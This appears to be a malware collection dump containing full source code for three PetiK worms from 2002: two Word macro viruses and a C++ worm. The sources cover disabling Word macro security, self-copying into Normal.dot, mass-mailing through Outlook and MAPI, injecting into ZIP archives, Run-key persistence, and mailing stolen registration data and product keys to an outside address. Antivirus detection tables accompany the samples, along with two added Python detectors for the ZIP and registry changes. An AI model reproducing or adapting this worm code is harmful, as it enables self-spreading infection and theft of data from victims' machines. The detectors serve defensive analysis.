MD5...: 8b66aadcff8510521ba7f0bacb6fc54a
SHA1..: e1022a03f29f2ffd74764d6e4547b691c16991bc
' Name : W97M.AutoSpread
' Author : PetiK
' Language : VBA Word
' Date : 09/05/2002

Attribute VB_Name = "AutoSpread"

Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long)

Sub AutoOpen()
nam = ActiveDocument.Name
vnam = Left(nam, Len(nam) - 4)

Call FuckProtection
Call InfectWord
Call Spread

If Day(Now) = 8 Then
MsgBox "This Document is infected by W97M." + vnam, vbCritical, "W97M." + vnam + ".A"
End If

End Sub

Sub InfectWord()
On Error Resume Next
Set nor = NormalTemplate.VBProject.VBComponents
Set doc = ActiveDocument.VBProject.VBComponents
srcmod = "C:\kitep.drv"
If nor.Item("AutoSpread").Name <> "AutoSpread" Then
doc("AutoSpread").Export srcmod
nor.Import srcmod
End If
If doc.Item("AutoSpread").Name <> "AutoSpread" Then
nor("AutoSpread").Export srcmod
doc.Import srcmod
ActiveDocument.Save
End If
Kill (srcmod)
End Sub

Sub FuckProtection()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub

Sub Spread()
On Error Resume Next
subj = Left(ActiveDocument.Name, Len(ActiveDocument.Name) - 4)
att = ActiveDocument.FullName
win = Environ("windir")
FileSystem.MkDir win + "\AutoSpread"
x = 0
nfile = ""
Do While x < 8
Randomize (Timer)
nfile = nfile + Chr(Int(Rnd(1) * 8) + 48)
x = x + 1
Loop
reg = nfile
nfile = nfile + ".vbs"
nfile = win + "\AutoSpread\" + nfile
Open nfile For Output As #1
Print #1, "'From W97M.AutoSpread"
Print #1, "On Error Resume Next"
Print #1, "Set out=CreateObject(""Outlook.Application"")"
Print #1, "Set map=out.GetNameSpace(""MAPI"")"
Print #1, "For Each C in map.AddressLists"
Print #1, "If C.AddressEntries.Count <> 0 Then"
Print #1, "For D=1 To C.AddressEntries.Count"
Print #1, "Set E=C.AddressEntries(D)"
Print #1, "Set env=out.CreateItem(0)"
Print #1, "env.To=E.Address"
Print #1, "env.Subject=""" + subj + """"
Print #1, "env.Body=""This confidential document is for you."""
Print #1, "env.Attachments.Add(""" + att + """)"
Print #1, "env.DeleteAfterSubmit=True"
Print #1, "If env.To <> """" Then"
Print #1, "env.Send"
Print #1, "End If"
Print #1, "Next"
Print #1, "End If"
Print #1, "Next"
Print #1, "WScript.Quit"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", reg) = nfile
End Sub

Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "W97M.AutoSpread.A coded by PetiK (c)2002"
.Heading = "W97M.AutoSpread"
.Animation = msoAnimationGetAttentionMajor
.Button = msoButtonSetOK
.Show
End With

slp = Sleep(5000)

For nb = 1 To Int(Rnd(1) * 10) + 1
Selection.TypeText "Hi guy, You're infected by my virus. It's not dangerous. "
Selection.TypeText "Refer to AntiVirus site to disinfect your computer. "
Selection.TypeText "No dangerous payload, large spread, it's coded by PetiK. "
Next nb

End Sub

76406570.vbs

'From W97M.AutoSpread
On Error Resume Next
Set out=CreateObject("Outlook.application")
Set map=out.GetNameSpace("MAPI")
For Each C in map.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set E=C.AddressEntries(D)
Set env=out.CreateItem(0)
env.To=E.Address
env.Subject="HelloWorld"
env.Body="This confidential document is for you."
env.Attachments.Add("C:\PetiK\W32.HLLW.RLF\HelloWorld.doc")
env.DeleteAfterSubmit=True
If env.To <> "" Then
env.Send
End If
Next
End If
Next
WScript.Quit
File AutoSpread.doc received on 05.16.2009 10:45:28 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 W97M/Apish.B
AntiVir 7.9.0.168 2009.05.15 W2000M/Droopy.A
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.15 W97M/Beko.B@mm
Avast 4.8.1335.0 2009.05.15 MW97:Beko family
AVG 8.5.0.336 2009.05.15 W97M/Beko
BitDefender 7.2 2009.05.16 W97M.Petik.A@mm
CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M
ClamAV 0.94.1 2009.05.15 WM.Pivis
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 Win32.Petik
eTrust-Vet 31.6.6508 2009.05.16 W97M/Beko.B:mm
F-Prot 4.4.4.56 2009.05.15 W97M/Beko.B@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W97M/Petik.B
GData 19 2009.05.16 W97M.Petik.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Macro.Beko
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W97M/Generic@MM
McAfee+Artemis 5616 2009.05.15 W97M/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Droopy.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Aspread.A@mm
NOD32 4080 2009.05.15 W97M/Beko.B
Norman 6.01.05 2009.05.16 W97M/Beko.B
nProtect 2009.1.8.0 2009.05.16 W97M.Petik.A@mm
Panda 10.0.0.14 2009.05.15 W97M/CokeBoy
PCTools 4.4.2.0 2009.05.15 WORD.97.Petaspr.A
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 Worm.Mail.Agent.ac
Sophos 4.41.0 2009.05.16 WM97/Spread-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 W97M.Beko@mm
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_BEKO.B
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 W97M.Beko.B
VirusBuster 4.6.5.0 2009.05.15 WORD.97.Petaspr.A

Additional information
File size: 40960 bytes
MD5...: b7f7ed86d457fec2493db21e8886b981
SHA1..: 5f1c2e11b84ac3df1e06f9dc290c3706735b8065
/*
Name : I-Worm.Archiver
Author : PetiK
Date : May 10th 2002 -
Language : C++

Comments : Infects ZIP files through WinZip (winzip32.exe, located via its App Paths registry key).

The same thing can be done with PowerArchiver:

powerarc -a -c4 archive.zip virus.exe

*/

#include <windows.h>
#include <stdio.h>
#include <mapi.h>

#pragma argused
#pragma inline

char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50];
char *fnam[]={"news","support","info","newsletter","webmaster"};
char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"};
LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
char attname[]="news_xxxxxxxx.exe";
LPTSTR cmdLine,ptr;
BOOL installed;
BYTE desktop[50],favoris[50],personal[50],winzip[50];
DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip);
DWORD type=REG_SZ;
long i;

LHANDLE session;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
HKEY hReg;
WIN32_FIND_DATA ffile;

void infzip(char *);

ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
GetModuleFileName(hInst,filen,100);
GetSystemDirectory((char *)sysdir,100);
GetWindowsDirectory((char *)copyn,100);
strcpy(windir,copyn);
strcat(copyn,"\\Archiver.exe");
installed=FALSE;
cmdLine=GetCommandLine();
if(cmdLine) {
for(ptr=cmdLine;ptr[0]!='-' && ptr[1]!=0;ptr++);
if(ptr[0]=='-' && ptr[1]!=0) {
switch(ptr[1]) {
default:
break;
case 'i':
installed=TRUE;
break;
case 'p':
ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0);
MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002",
"I-Worm.Archiver",MB_OK|MB_ICONINFORMATION);
ExitProcess(0);
break;
}
}
}

if(!installed) {
CopyFile(filen,copyn,FALSE);
strcpy(copyreg,copyn);
strcat(copyreg," -i");
/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100);
RegCloseKey(hReg); */
ExitProcess(0);
}

RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip);
RegCloseKey(hReg);
if(strlen(winzip)!=0) {
infzip(windir);
infzip(sysdir);
infzip(desktop);
infzip(personal);
infzip(favoris);
infzip("C:\\");
}
/*
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0

end_all_asm:
}

hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);

for(i=0;i<8;i++)
attname[i+5]='1'+(char)(9*rand()/RAND_MAX);
fsubj[0]=0;
wsprintf(fsubj,"News from %s%s",fnam[GetTickCount()%4],fmel[GetTickCount()%5]);

mes->ulReserved=0;
mes->lpszSubject=fsubj;
mes->lpszNoteText="This is some news send by our firm about security.\n"
"Please read by clicking on attached file.\n"
"\tBest Regards";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filen;
mes->lpFiles->lpszFileName=attname;
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
*/
ExitProcess(0);
}
void infzip(char *folder)
{
register bool abc=TRUE;
register HANDLE fh;
if(strlen(folder)!=0) {
SetCurrentDirectory(folder);
fh=FindFirstFile("*.zip",&ffile);
if(fh!=INVALID_HANDLE_VALUE) {
while(abc) {
inzip[0]=0;
wsprintf(inzip,"%s -a -r %s %s",winzip,ffile.cFileName,copyn);
WinExec(inzip,1);
abc=FindNextFile(fh,&ffile);
}
}
}
}
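Added example, not code from PetiK's archive: a Python check for the infection technique infzip() uses above. The worm does not touch the ZIP format itself; it shells out to "winzip32 -a -r archive.zip %windir%\Archiver.exe", so every archive in the scanned folders gains an executable member. The scanner below opens each archive and flags members that carry an executable extension or whose first two bytes are the PE "MZ" stub, which catches the injected copy even if it were renamed. The sample archive and its fake "MZ" member are constructed inline and contain no real code.

```python
"""Added example (not part of PetiK's archive): find executables injected
into ZIP archives the way I-Worm.Archiver does
(winzip32 -a -r <archive>.zip %windir%\\Archiver.exe), by inspecting
archive members instead of trusting the archive's extension."""
import io
import zipfile
from pathlib import Path

EXEC_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs")


def suspicious_members(zip_bytes: bytes) -> list:
    """Return names of members that are PE images (start with 'MZ') or carry
    an executable/script extension. Only the first two bytes of each member
    are decompressed, so large archives are cheap to check."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                magic = fh.read(2)
            if magic == b"MZ" or info.filename.lower().endswith(EXEC_EXTS):
                hits.append(info.filename)
    return hits


def scan_zip_tree(root) -> dict:
    """Map every .zip under root to its suspicious members; archives with no
    hits are omitted and corrupt archives are skipped."""
    report = {}
    for path in Path(root).rglob("*.zip"):
        try:
            hits = suspicious_members(path.read_bytes())
        except zipfile.BadZipFile:
            continue
        if hits:
            report[str(path)] = hits
    return report


def build_sample_archive(infected: bool) -> bytes:
    """Constructed sample: a harmless archive, optionally with a fake PE
    member named like the worm's copy ('MZ' header only, no real code)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "quarterly figures\n")
        zf.writestr("data/figures.csv", "q1,q2\n1,2\n")
        if infected:
            zf.writestr("Archiver.exe", b"MZ\x90\x00" + b"\x00" * 60)
    return buf.getvalue()


if __name__ == "__main__":
    print(suspicious_members(build_sample_archive(True)))   # ['Archiver.exe']
    print(suspicious_members(build_sample_archive(False)))  # []
```

Point scan_zip_tree() at the same locations the worm walks (Windows and System directories, Desktop, Personal, Favorites and the root of C:) to enumerate archives that need the injected member removed.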
File Archiver.exe received on 05.16.2009 10:45:20 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Petik.worm.23048
AntiVir 7.9.0.168 2009.05.15 Worm/Petik-1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!185a
Avast 4.8.1335.0 2009.05.15 Win32:Trojan-gen {Other}
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.J@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.15 Worm.Archer
Comodo 1157 2009.05.08 Worm.Win32.Petik.Archer
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Petik.49152
eSafe 7.0.17.0 2009.05.14 Win32.Petik.b
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.23040
F-Prot 4.4.4.56 2009.05.15 W32/Malware!185a
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Win32.Petik.J@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/Stopin.d@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.d@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik-1
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick
NOD32 4080 2009.05.15 Win32/Petik.Archer
Norman 6.01.05 2009.05.16 W32/Petik.AM
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.23040
Panda 10.0.0.14 2009.05.15 Worm Generic
PCTools 4.4.2.0 2009.05.15 HLLW.Petarch.A
Prevx 3.0 2009.05.16 High Risk Worm
Rising 21.29.51.00 2009.05.16 Worm.Archivera
Sophos 4.41.0 2009.05.16 W32/Archiver-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.C
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Archiver
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 HLLW.Petarch.A

Additional information
File size: 23040 bytes
MD5...: 6079048134255a415e569a57402d7c56
SHA1..: 35867a4491825a6c2557e6103cb6164705d6328d
SHA256: f88aec37d60795ac97b73574b674bbf40bd8466dac54a33b1e1a8c0df8035391
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : W97M.ApiWord
' Author : PetiK
' Language : VBA Word
' Date : 14/05/2002

VB_Name = "ApiWord"
Private Declare Function Sleep& Lib "kernel32" (ByVal dwReserved As Long)
Private Declare Function CopyFile& Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Boolean)
Private Declare Function CreateDirectory& Lib "kernel32" Alias "CreateDirectoryA" (ByVal lpszCrDir As String, ByVal secu As Long)
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long)
Private Declare Function ShowCursor& Lib "user32" (ByVal fshow As Boolean)
Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias "WritePrivateProfileStringA" _
(ByVal lpszSection As String, ByVal lpszKey As String, _
ByVal lpszString As String, ByVal lpszFile As String)

Sub AutoOpen()
slp = Sleep(1000)
winp = Environ("windir")
crd = CreateDirectory(winp + "\ApiSystem", 0)
cp = CopyFile(ActiveDocument.FullName, winp + "\ApiSystem\HelloU.doc", False)

Call endprotect
Call infdoc
Call SrchF
Call PayLoad

End Sub

Sub HelpAbout()
MsgBox "System must be shutdown.", vbCritical, "Warning"
ext = ExitWindowsEx(2, 0)
End Sub

Sub SrchF()
On Error Resume Next
winp = Environ("windir")
infile = winp + "\ApiSystem\AboutU.ini"

MS = "HKEY_LOCAL_MACHINE\Software\Microsoft\ApiWord"
If System.PrivateProfileString("", MS, "Send Info") <> "OK" Then

CV = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
nom = System.PrivateProfileString("", CV, "RegisteredOwner")
ent = System.PrivateProfileString("", CV, "RegisteredOrganization")
ver = System.PrivateProfileString("", CV, "Version")
vern = System.PrivateProfileString("", CV, "VersionNumber")
pi = System.PrivateProfileString("", CV, "ProductId")
pk = System.PrivateProfileString("", CV, "ProductKey")
pf = System.PrivateProfileString("", CV, "ProgramFilesDir")

sp = System.PrivateProfileString("", _
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page")

wr = WritePrivateProfileString("Information", "Name", nom, infile)
wr = WritePrivateProfileString("Information", "Organization", ent, infile)
wr = WritePrivateProfileString("Information", "Version of Windows", ver, infile)
wr = WritePrivateProfileString("Information", "Number of Version", vern, infile)
wr = WritePrivateProfileString("Information", "Identification Number", pi, infile)
wr = WritePrivateProfileString("Information", "Key Number", pk, infile)
wr = WritePrivateProfileString("Information", "Program Files Path", pf, infile)
wr = WritePrivateProfileString("Information", "Start Page", sp, infile)

Set out = CreateObject("Outlook.Application")
Set map = out.GetNameSpace("MAPI")
map.Logon "profile", "password"
mel = out.CreateItem(0)
mel.To = "apiinfo@lycos.fr"
mel.Subject = "Mail from " + nom
mel.Attachments.Add (infile)
mel.DeleteafterSubmit = True
mel.Send
map.Logoff
System.PrivateProfileString("", MS, "Author") = "PetiK"
System.PrivateProfileString("", MS, "Info File") = infile
System.PrivateProfileString("", MS, "Name") = "W97M.ApiWord"
System.PrivateProfileString("", MS, "Version") = "A"
System.PrivateProfileString("", MS, "Send Info") = "OK"
End If

End Sub
Sub infdoc()
On Error Resume Next
winp = Environ("windir")
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = winp + "\ApiSystem\src.txt"
If Nor.Item("ApiWord").Name <> "ApiWord" Then
Doc("ApiWord").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("ApiWord").Name <> "ApiWord" Then
Nor("ApiWord").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
End Sub

Sub endprotect()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End Select
WordBasic.DisableAutoMacros 0
End Sub

Sub PayLoad()
num = Int((Rnd * 10) + 1)
If num = 1 Then
sm = SwapMouseButton(&H2)
ElseIf num = 5 Then
sc = ShowCursor(False)
slp = Sleep(10000)
sc = ShowCursor(True)
End If

End Sub
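Added example, not code from PetiK's archive: both W97M.AutoSpread (FuckProtection) and W97M.ApiWord (endprotect) make the same registry changes before they copy their module into Normal.dot, and AutoSpread additionally registers its dropped %windir%\AutoSpread\<8 digits>.vbs mailer under the HKLM Run key. The Python audit below parses a "reg export" text dump (the sample is constructed, not from a real machine) and reports Word Security\Level set to 1 (Low, no macro prompt), AccessVBOM set to 1 (trusted access to the VBA project, which the VBComponents Export/Import self-copy needs) and Run entries that launch scripts or match the AutoSpread drop-name pattern (eight characters drawn from "0" to "7", as the Chr(Int(Rnd(1) * 8) + 48) loop produces). The .reg parser handles only the string and dword value forms needed here.

```python
"""Added example (not part of PetiK's archive): audit a `reg export` text
dump for the macro-security downgrade and Run-key persistence used by
W97M.AutoSpread and W97M.ApiWord."""
import re

SECURITY_KEY = re.compile(r"\\Software\\Microsoft\\Office\\(\d+\.\d+)\\Word\\Security$", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run$", re.I)
# Shape of AutoSpread's dropped mailer: <windir>\AutoSpread\<eight chars '0'..'7'>.vbs
AUTOSPREAD_NAME = re.compile(r"[\\/]AutoSpread[\\/][0-7]{8}\.vbs$", re.I)
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")


def parse_reg_export(text: str) -> dict:
    """Parse the subset of .reg syntax needed here: [key] headers,
    "name"="string" (with \\\\ and \\" escapes) and "name"=dword:hex."""
    tree, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            tree.setdefault(key, {})
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if key is None or m is None:
            continue
        name, value = m.group(1), m.group(2)
        if value.lower().startswith("dword:"):
            tree[key][name] = int(value[6:], 16)
        elif len(value) >= 2 and value.startswith('"') and value.endswith('"'):
            tree[key][name] = value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return tree


def audit(tree: dict) -> list:
    """Return findings for tampered Word macro security and suspicious Run entries."""
    findings = []
    for key, values in tree.items():
        sec = SECURITY_KEY.search(key)
        if sec:
            level = values.get("Level")
            if isinstance(level, int) and level <= 1:
                findings.append(f"Word {sec.group(1)} macro security Level={level} (Low)")
            if values.get("AccessVBOM") == 1:
                findings.append(f"Word {sec.group(1)} AccessVBOM=1 (VBA project access trusted)")
        if RUN_KEY.search(key):
            for name, target in values.items():
                t = str(target)
                if AUTOSPREAD_NAME.search(t):
                    findings.append(f"Run\\{name} -> {t} (AutoSpread dropper name pattern)")
                elif t.lower().endswith(SCRIPT_EXTS):
                    findings.append(f"Run\\{name} -> {t} (script started at logon)")
    return findings


# Constructed sample dump (not from a real machine): one infected Word 2002
# profile plus a benign and a malicious Run entry.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]
"Level"=dword:00000001
"AccessVBOM"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"01234567"="C:\\WINDOWS\\AutoSpread\\01234567.vbs"
'''

if __name__ == "__main__":
    for finding in audit(parse_reg_export(SAMPLE_EXPORT)):
        print(finding)
```

Produce the dump with "reg export HKCU\Software\Microsoft\Office out.reg" and "reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run run.reg" on the suspect machine; Level=1 under a Security key is never written by Word's own UI for a user who has not deliberately chosen Low, so it is a strong indicator on its own.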
File ApiWord.doc received on 05.16.2009 10:45:11 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Petik.B!IK
AhnLab-V3 5.0.0.2 2009.05.15 W97M/Apish
AntiVir 7.9.0.168 2009.05.15 W2000M/Droopy.A
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.Petik
Authentium 5.1.2.4 2009.05.15 W97M/Apish.A
Avast 4.8.1335.0 2009.05.15 MW97:Apish-A
AVG 8.5.0.336 2009.05.15 W97M/Droopy
BitDefender 7.2 2009.05.16 W97M.Petik.B
CAT-QuickHeal 10.00 2009.05.15 W97M.Prilissa
ClamAV 0.94.1 2009.05.15 W97M.Petik.B
Comodo 1157 2009.05.08 Virus.MSWord.Petik.b
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 W97M.ApiWord
eTrust-Vet 31.6.6508 2009.05.16 W97M/Apish.A
F-Prot 4.4.4.56 2009.05.15 W97M/Apish.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Petik.b
Fortinet 3.117.0.0 2009.05.16 W97M/Petik.B
GData 19 2009.05.16 W97M.Petik.B
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Petik.B
K7AntiVirus 7.10.735 2009.05.14 Macro.Petik.b
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Petik.b
McAfee 5616 2009.05.15 W97M/Generic@MM
McAfee+Artemis 5616 2009.05.15 W97M/Generic@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Droopy.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Petik.B
NOD32 4080 2009.05.15 W97M/Apish.A
Norman 6.01.05 2009.05.16 W97M/Amish.A
nProtect 2009.1.8.0 2009.05.16 W97M.Petik.B
Panda 10.0.0.14 2009.05.15 W97M/CokeBoy
PCTools 4.4.2.0 2009.05.15 WORD.97.Petapwd.A
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 Macro.Word.ApiWord
Sophos 4.41.0 2009.05.16 WM97/Petik-B
Sunbelt 3.2.1858.2 2009.05.16 Virus.MSWord.Petik.b (v)
Symantec 1.4.4.12 2009.05.16 W97M.Apish
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_PETIK.B
VBA32 3.12.10.5 2009.05.16 Virus.MSWord.Petik.b
